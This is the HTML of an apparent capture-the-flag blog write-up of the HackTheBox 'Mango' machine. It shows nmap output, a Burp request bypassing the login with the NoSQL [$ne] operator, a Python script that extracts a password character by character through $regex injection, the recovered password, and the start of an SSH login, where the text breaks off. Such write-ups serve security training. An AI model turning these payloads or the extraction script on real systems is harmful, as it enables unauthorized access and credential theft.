<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="Quick Summary   → Another awesome machine – &quot;Mango&quot; is a medium difficulty box that was vulnerable into NoSQL injection attack. I was stuck on the main page and the analytics page for an h">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox - Mango 🥭🥭">
<meta property="og:url" content="https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/index.html">
<meta property="og:site_name" content="❯ PΛYΛƧ0">
<meta property="og:description" content="Quick Summary   → Another awesome machine – &quot;Mango&quot; is a medium difficulty box that was vulnerable into NoSQL injection attack. I was stuck on the main page and the analytics page for an h">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://ph-payas0.github.io/img/mango/mango-machine.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/mango/mango-home-page.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/mango/mango-analytcs.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/mango/mango-cert.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/mango/mango-login-page.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/mango/mango-under-plantation.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/mango/shell.PNG">
<meta property="og:image" content="https://ph-payas0.github.io/img/mango/file-read.PNG">
<meta property="og:image" content="https://ph-payas0.github.io/img/mango/suid.PNG">
<meta property="og:image" content="https://ph-payas0.github.io/img/mango/file-write.PNG">
<meta property="og:image" content="https://www.hackthebox.eu/badge/image/128965">
<meta property="article:published_time" content="2020-04-18T01:18:53.000Z">
<meta property="article:modified_time" content="2020-06-09T21:41:00.778Z">
<meta property="article:author" content="medz">
<meta property="article:tag" content="retired">
<meta property="article:tag" content="MongoDB">
<meta property="article:tag" content="NoSQL">
<meta property="article:tag" content="GTFObins">
<meta property="article:tag" content="jjs">
<meta property="article:tag" content="linux">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ph-payas0.github.io/img/mango/mango-machine.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon-1.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/android-chrome-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>HackTheBox - Mango 🥭🥭</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="❯ PΛYΛƧ0" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020-04-26/HackTheBox-Control/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020-04-11/HackTheBox-Traverxec/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&text=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&title=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&is_video=false&description=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox - Mango 🥭🥭&body=Check out this article: https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&title=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&title=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&title=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&title=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&name=HackTheBox - Mango 🥭🥭&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&t=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Quick-Summary"><span class="toc-number">1.</span> <span class="toc-text">Quick Summary</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Penetration-Testing-Methodologies"><span class="toc-number">2.</span> <span class="toc-text">Penetration Testing Methodologies</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Network-Scanning"><span class="toc-number">3.</span> <span class="toc-text">Network Scanning</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Walkthrough"><span class="toc-number">3.1.</span> <span class="toc-text">Walkthrough</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap-results"><span class="toc-number">3.2.</span> <span class="toc-text">Nmap results</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Enumeration"><span class="toc-number">4.</span> <span class="toc-text">Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Mango-Website"><span class="toc-number">4.1.</span> <span class="toc-text">Mango Website</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Post-Exploitation"><span class="toc-number">5.</span> <span class="toc-text">Post - Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Bypass-Login"><span class="toc-number">5.1.</span> <span class="toc-text">Bypass Login</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Under-Plantation"><span class="toc-number">5.2.</span> <span class="toc-text">Under Plantation</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploitation"><span class="toc-number">6.</span> <span class="toc-text">Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#NoSQL-Injection"><span class="toc-number">6.1.</span> <span class="toc-text">NoSQL Injection</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Get-user-shell"><span class="toc-number">6.2.</span> <span class="toc-text">Get user shell</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">7.</span> <span class="toc-text">Privilege Escalation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#JJS-Exploitation"><span class="toc-number">7.1.</span> <span class="toc-text">JJS Exploitation</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Get-the-root-txt"><span class="toc-number">7.2.</span> <span class="toc-text">Get the root.txt</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Administrator-Shell"><span class="toc-number">7.3.</span> <span class="toc-text">Administrator Shell</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
        <div class="content index py4">
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        HackTheBox - Mango 🥭🥭
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">❯ PΛYΛƧ0</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-04-18T01:18:53.000Z" itemprop="datePublished">18-04-2020</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/HackTheBox/">HackTheBox</a> › <a class="category-link" href="/categories/HackTheBox/PenTesting/">PenTesting</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/GTFObins/" rel="tag">GTFObins</a>, <a class="tag-link" href="/tags/MongoDB/" rel="tag">MongoDB</a>, <a class="tag-link" href="/tags/NoSQL/" rel="tag">NoSQL</a>, <a class="tag-link" href="/tags/jjs/" rel="tag">jjs</a>, <a class="tag-link" href="/tags/linux/" rel="tag">linux</a>, <a class="tag-link" href="/tags/retired/" rel="tag">retired</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p><img src="/img/mango/mango-machine.png" alt="HackTheBox-Sniper" title="Mango machine details"></p>
<hr>
<h2 id="Quick-Summary"><a href="#Quick-Summary" class="headerlink" title="Quick Summary"></a>Quick Summary</h2><p>   → Another awesome machine – <code>&quot;Mango&quot;</code> is a medium difficulty box that was vulnerable into <code>NoSQL injection</code> attack. I was stuck on the <code>main page</code> and the <code>analytics page</code> for an hour until i realize that was only a rabbit hole. There was a login page in <code>staging-order.mango.htb</code> that’s appeal on my <em>NMAP</em> scan. When I go to the forum I found out that the <code>web apps</code> use <code>MongoDB</code> when you try to search on google <code>Mango db</code> it’s a database program, classified as a NoSQL database program.<br>   Using payload from <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" target="_blank" rel="noopener">PayloadAllTheThings</a> i managed to bypass the login page’ but when I get in i’ll redirect at a <code>Under Plantation</code> page that was another rabbit hole, but it’s okay because I have now the idea that the machine is vulnerable to <code>NoSQL Injection</code> attack. With my python <code>script</code> i get the credentials for user <code>mango</code> &amp; <code>admin</code> to get in to the machine via <code>SSH</code> and get the <code>user.txt</code>.<br>   In the privilege escalation part there was a vulnerable software installed which is the <code>jjs</code> – a java program command-line tool that is used to invoke the Nashorn engine. You can use it to interpret one or several script files, or to run an interactive shell.<br>   I abuse the vulnerabilty by reading the <code>root.txt</code> and also inject my own <code>SSH</code> key and get in to the machine and got the administrator shell.</p>
<hr>
<h2 id="Penetration-Testing-Methodologies"><a href="#Penetration-Testing-Methodologies" class="headerlink" title="Penetration Testing Methodologies"></a>Penetration Testing Methodologies</h2><ol>
<li><p><strong>Network Scanning</strong></p>
<p>→ Nmap scan</p>
<p>→ discover open ports and what services are running</p>
</li>
<li><p><strong>Enumeration</strong></p>
<p>→ Browsing the HTTP Service</p>
<p>→ Exploring the <code>Analytics page</code></p>
<p>→ check the ssl certicate of the webapps</p>
</li>
<li><p><strong>Post - Exploitation</strong></p>
<p>→ Trying to bypass the Login page at <code>staging-order.mango.htb</code></p>
<p>→ with this payload from <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection" target="_blank" rel="noopener">PayloadAllTheThings - NoSQL Injection Attack</a> I managed to bypass the login</p>
</li>
<li><p><strong>Exploitation</strong></p>
<p>→ bruteforce the credentials of user – <code>mango</code> &amp; <code>admin</code> using python script</p>
<p>→ After a minutes finally gets the both creds, Login with <code>SSH Key</code> and get the <code>user.txt</code></p>
</li>
<li><p><strong>Privilege Escalation</strong></p>
<p>→ execute <a href="https://github.com/rebootuser/LinEnum" target="_blank" rel="noopener">LinEnum.sh</a> to look what we can do the machine</p>
<p>→ look for what permission is allowed to user – <code>admin</code></p>
<p>→ found the vulnerable software – <code>jjs</code></p>
<p>→ with the help from <a href="https://gtfobins.github.io/gtfobins/jjs/" target="_blank" rel="noopener">GTFObins - jjs</a> I can execute <code>File read</code> command to get <code>root.txt</code></p>
<p>→ I can also inject SSH keys with <code>File write</code> command</p>
<p>→ Login with my generated SSH keys and become the administrator.</p>
</li>
</ol>
<hr>
<h2 id="Network-Scanning"><a href="#Network-Scanning" class="headerlink" title="Network Scanning"></a>Network Scanning</h2><h3 id="Walkthrough"><a href="#Walkthrough" class="headerlink" title="Walkthrough"></a>Walkthrough</h3><p>→ I always begin at <strong><em>NMAP</em></strong> to look on the services what is running. I always use</p>
<hr>
<ul>
<li>-sV      ⇒ Probe open ports to determine service/version info</li>
<li>-sC      ⇒ equivalent to —script=default</li>
<li>-T 0-5   ⇒ Set timing template - higher is faster (less accurate)</li>
<li>-A-      ⇒ Agressive scan</li>
<li>-oN      ⇒ to save our scan results to a text file</li>
</ul>
<hr>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">nmap -sV -sC -A -T4 <span class="number">10.10</span><span class="number">.10</span><span class="number">.162</span> -oN nmap-Mango</span><br></pre></td></tr></table></figure>

<hr>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Mango </span><br><span class="line">❯ nmap -sV -sC -A 10.10.10.162 -oN nmap-Mango</span><br><span class="line">Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-19 05:31 PST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.10.162</span><br><span class="line">Host is up (0.21s latency).</span><br><span class="line">Not shown: 997 closed ports</span><br><span class="line">PORT    STATE SERVICE  VERSION</span><br><span class="line">22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)</span><br><span class="line">|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)</span><br><span class="line">|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)</span><br><span class="line">80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))</span><br><span class="line">|_http-server-header: Apache/2.4.29 (Ubuntu)</span><br><span class="line">|_http-title: 403 Forbidden</span><br><span class="line">443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))</span><br><span class="line">|_http-server-header: Apache/2.4.29 (Ubuntu)</span><br><span class="line">|_http-title: Mango | Search Base</span><br><span class="line">| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN</span><br><span class="line">| Not valid before: 2019-09-27T14:21:19</span><br><span class="line">|_Not valid after:  2020-09-26T14:21:19</span><br><span class="line">|_ssl-date: TLS randomness does not represent time</span><br><span class="line">| tls-alpn: </span><br><span class="line">|_  http/1.1</span><br><span class="line">No exact OS matches <span class="keyword">for</span> host (If you know what OS is running on it, see https://nmap.org/submit/ ).</span><br><span class="line">TCP/IP fingerprint:</span><br><span class="line">OS:SCAN(V=7.80%E=4%D=4/19%OT=22%CT=1%CU=30519%PV=Y%DS=2%DC=T%G=Y%TM=5E9B71D</span><br><span class="line">OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS</span><br><span class="line">OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1</span><br><span class="line">OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN</span><br><span class="line">OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A</span><br><span class="line">OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R</span><br><span class="line">OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F</span><br><span class="line">OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%</span><br><span class="line">OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD</span><br><span class="line">OS:=S)</span><br><span class="line"></span><br><span class="line">Network Distance: 2 hops</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">TRACEROUTE (using port 8888/tcp)</span><br><span class="line">HOP RTT       ADDRESS</span><br><span class="line">1   209.53 ms 10.10.14.1</span><br><span class="line">2   216.74 ms 10.10.10.162</span><br><span class="line"></span><br><span class="line">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 47.79 seconds</span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Mango took 48s </span><br><span class="line">❯</span><br></pre></td></tr></table></figure>
<hr>
<h3 id="Nmap-results"><a href="#Nmap-results" class="headerlink" title="Nmap results"></a>Nmap results</h3><p>So there’s port open.</p>
<ul>
<li>22      ⇒ which basically use for SSH Connections</li>
<li>80       ⇒ which basically running a website</li>
<li>443       ⇒ which holding SSL Certificate with <code>&quot;staging-order.mango.htb&quot;</code> I added it to my <code>/etc/hosts</code> file.</li>
</ul>
<hr>
<hr>
<h2 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h2><h3 id="Mango-Website"><a href="#Mango-Website" class="headerlink" title="Mango Website"></a>Mango Website</h3><p>Normally i explore first the website’ because that will give us interesting stuffs so :</p>
<p><img src="/img/mango/mango-home-page.png" alt="HackTheBox-Sniper" title="Mango Webpage"></p>
<p>The main page is looks like a google search right ? At first I didn’t realize that the main page is a hint for this machine i will tell it later.</p>
<p>Next i clicked on the analytics tabs :</p>
<p><img src="/img/mango/mango-analytcs.png" alt="HackTheBox-Sniper" title="Mango Webpage"></p>
<p>This page is totally a rabbit hole’ I can’t do anything about the website so I check the SSL Certifcate and it was registed at <code>staging-order.mango.htb</code> so I added it into my <code>/etc/hosts</code> file.</p>
<p><img src="/img/mango/mango-cert.png" alt="HackTheBox-Sniper" title="Mango Webpage"></p>
<p>So after that I visited <code>staging-order.mango.htb</code> and it was a Login page.</p>
<p><img src="/img/mango/mango-login-page.png" alt="HackTheBox-Sniper" title="Mango Login page"></p>
<hr>
<h2 id="Post-Exploitation"><a href="#Post-Exploitation" class="headerlink" title="Post - Exploitation"></a>Post - Exploitation</h2><h3 id="Bypass-Login"><a href="#Bypass-Login" class="headerlink" title="Bypass Login"></a>Bypass Login</h3><p>I mention about that the main page is looks like a google search’ I realized that was hint to give me idea what should I do for this phase. From the forum it’s a database, the name <code>MANGO</code> is a big hint, so I go to google and search about <code>Mango DB</code> and it give me a results <code>MongoDB</code> which use <code>NoSQL</code><br>database program.</p>
<p>so I search about <strong>NoSQL Injection Attack</strong> and I found <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection" target="_blank" rel="noopener">this</a> then tried to login with some credentials and used <code>Burp Suite</code> to intercept the request, then modified the request body parameters base on the payload so :</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Burp Suite Repeater</span></span><br><span class="line"></span><br><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: staging-order.mango.htb</span><br><span class="line">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: en-US,en;q=0.5</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Referer: http://staging-order.mango.htb/index.php</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 53</span><br><span class="line">DNT: 1</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: PHPSESSID=9rr8f4ht86hjj17q1vkrlhskfb</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line">username[<span class="variable">$ne</span>]=payas0&amp;password[<span class="variable">$ne</span>]=payas0&amp;login=login</span><br></pre></td></tr></table></figure>

<p>I modified the username &amp; password parameters by adding this <code>[$ne]</code> sending this it will return to <code>HTTP/1.1 200 OK</code></p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Burp Suite Repeater</span></span><br><span class="line"></span><br><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Date: Sat, 18 Apr 2020 22:22:28 GMT</span><br><span class="line">Server: Apache/2.4.29 (Ubuntu)</span><br><span class="line">Expires: Thu, 19 Nov 1981 08:52:00 GMT</span><br><span class="line">Cache-Control: no-store, no-cache, must-revalidate</span><br><span class="line">Pragma: no-cache</span><br><span class="line">Vary: Accept-Encoding</span><br><span class="line">Content-Length: 3380</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: text/html; charset=UTF-8</span><br></pre></td></tr></table></figure>

<p>Follow redirection and it will go to <code>/home.php</code></p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Burp Suite Repeater</span></span><br><span class="line"></span><br><span class="line">GET /home.php HTTP/1.1</span><br><span class="line">Host: staging-order.mango.htb</span><br><span class="line">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: en-US,en;q=0.5</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Referer: http://staging-order.mango.htb/index.php</span><br><span class="line">DNT: 1</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: PHPSESSID=9rr8f4ht86hjj17q1vkrlhskfb</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br></pre></td></tr></table></figure>

<h3 id="Under-Plantation"><a href="#Under-Plantation" class="headerlink" title="Under Plantation"></a>Under Plantation</h3><p>when I finally bypass the login it goes me to <code>Under Plantation</code> page :</p>
<p><img src="/img/mango/mango-under-plantation.png" alt="HackTheBox-Sniper" title="Mango Webpage"></p>
<p>As you can see at the page there was a user – <code>admin@mango.htb</code> so I will keep it to my mind.<br>Now that I’m in I try to bruteforce the website under <code>/home.php</code> but bruteforcing is not really helpful until I found that this page is a rabbit hole again. but I have got a user <code>admin</code> and also already know that this was vulnerable to <code>NoSQL Injection</code> attack.</p>
<hr>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><h3 id="NoSQL-Injection"><a href="#NoSQL-Injection" class="headerlink" title="NoSQL Injection"></a>NoSQL Injection</h3><p>I search about <code>MongoDB - NoSQL Injection</code> attack luckily i found this <a href="https://blog.0daylabs.com/2016/09/05/mongo-db-password-extraction-mmactf-100/" target="_blank" rel="noopener">article</a> it is about extracting admin password from the database using <code>NoSQL Injections</code>.</p>
<p>So then I made a python script that will automate the extraction of password similar to the article, this will need patience because password will reveal one by one so :</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># python</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> urllib3</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line">urllib3.disable_warnings()</span><br><span class="line"></span><br><span class="line">username=<span class="string">"mango"</span></span><br><span class="line">password=<span class="string">""</span></span><br><span class="line">u=<span class="string">"http://staging-order.mango.htb"</span> <span class="comment"># Enter the url here</span></span><br><span class="line">headers=&#123;<span class="string">'content-type'</span>: <span class="string">'application/x-www-form-urlencoded'</span>, <span class="string">'staging-order.mango.htb'</span>: <span class="string">''</span>&#125; </span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> string.printable:</span><br><span class="line">        <span class="keyword">if</span> c <span class="keyword">not</span> <span class="keyword">in</span> [<span class="string">'*'</span>,<span class="string">'+'</span>,<span class="string">'.'</span>,<span class="string">'?'</span>,<span class="string">'|'</span>,<span class="string">'&amp;'</span>,<span class="string">'\\'</span>]:</span><br><span class="line">            payload=<span class="string">'username=%s&amp;password[$regex]=^%s.*&amp;login=login'</span>% (username,password + c)</span><br><span class="line">            r = requests.post(u, data = payload, headers = headers, verify = <span class="literal">False</span>, allow_redirects = <span class="literal">False</span>)</span><br><span class="line">            <span class="comment">#print(payload)</span></span><br><span class="line">            <span class="comment">#print(r.status_code)</span></span><br><span class="line">            <span class="keyword">if</span> r.status_code == <span class="number">302</span>:</span><br><span class="line">                print(<span class="string">"Found one more char : %s"</span> % (password+c))</span><br><span class="line">                password += c</span><br></pre></td></tr></table></figure>

<h3 id="Get-user-shell"><a href="#Get-user-shell" class="headerlink" title="Get user shell"></a>Get user shell</h3><p>after almost 10 minutes I complete extracting the user <code>mango</code> password</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">mango:		h3mXK8RhU~f&#123;]f5H</span><br></pre></td></tr></table></figure>

<p>Now login this with <code>SSH</code> I have now finally the initial shell.</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Mango via 🐍 v2.7.17 </span><br><span class="line">❯ ssh mango@10.10.10.162</span><br><span class="line">The authenticity of host <span class="string">'10.10.10.162 (10.10.10.162)'</span> can<span class="string">'t be established.</span></span><br><span class="line"><span class="string">ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0.</span></span><br><span class="line"><span class="string">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes</span></span><br><span class="line"><span class="string">Warning: Permanently added '</span>10.10.10.162<span class="string">' (ECDSA) to the list of known hosts.</span></span><br><span class="line"><span class="string">mango@10.10.10.162'</span>s password: </span><br><span class="line">Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)</span><br><span class="line"></span><br><span class="line"> * Documentation:  https://help.ubuntu.com</span><br><span class="line"> * Management:     https://landscape.canonical.com</span><br><span class="line"> * Support:        https://ubuntu.com/advantage</span><br><span class="line"></span><br><span class="line">  System information as of Sat Apr 18 22:39:50 UTC 